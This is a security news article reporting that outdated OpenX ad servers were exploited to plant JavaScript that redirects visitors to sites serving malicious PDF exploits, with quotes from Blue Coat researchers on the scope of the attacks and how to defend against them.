Malware, Vulnerability Management

Vulnerable ad servers exploited to compromise sites

Several sites running the OpenX free advertisement server were compromised this week, leading to a tenfold increase in malicious PDF exploit attempts detected by researchers at web security firm Blue Coat.

All but one of the compromised sites were using an outdated and vulnerable version of OpenX, which attackers exploited to host a piece of malicious JavaScript code on the ad server, Tim Van Der Horst, malware engineer at Blue Coat, told SCMagazineUS.com on Friday.

The malicious JavaScript creates an invisible IFRAME, which opens a background connection to an attack site that silently tries to infect users with a variety of exploits, including ones against Adobe Reader. Affected sites include a Nigerian news outlet and others pertaining to Filipino boxing, HTML tutorials, Venezuelan sports and Italian iPhones.

“Looking through yesterday's logs, there were 12 sites compromised this way,” Van Der Horst said.

OpenX announced in December that a remote vulnerability exists in version 2.8.2 of its software and provided an update to fix the issue. All affected sites except the Italian iPhone site were running this vulnerable version, Blue Coat researchers said.

They believe the Italian iPhone site, currently using the latest version of OpenX, likely also was compromised while using a previous version and failed to clean up the attacker's code during the update process. Another scenario is that there is a new, undiscovered vulnerability in OpenX 2.8.5, the latest version of the ad server.

A spokesperson for OpenX did not respond to a request for comment made by SCMagazineUS.com on Friday.

The malicious PDFs used in the attacks are detected by most traditional anti-virus scanners, Chris Larsen, senior malware researcher at Blue Coat, told SCMagazineUS.com on Friday. In addition, having an up-to-date version of Adobe Reader should protect users.

The victim sites are likely still infected and will continue to send traffic to the malware network until they're cleaned up by their administrators, Larsen said. A typical website today has many different components, making it hard for webmasters to keep track of everything.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.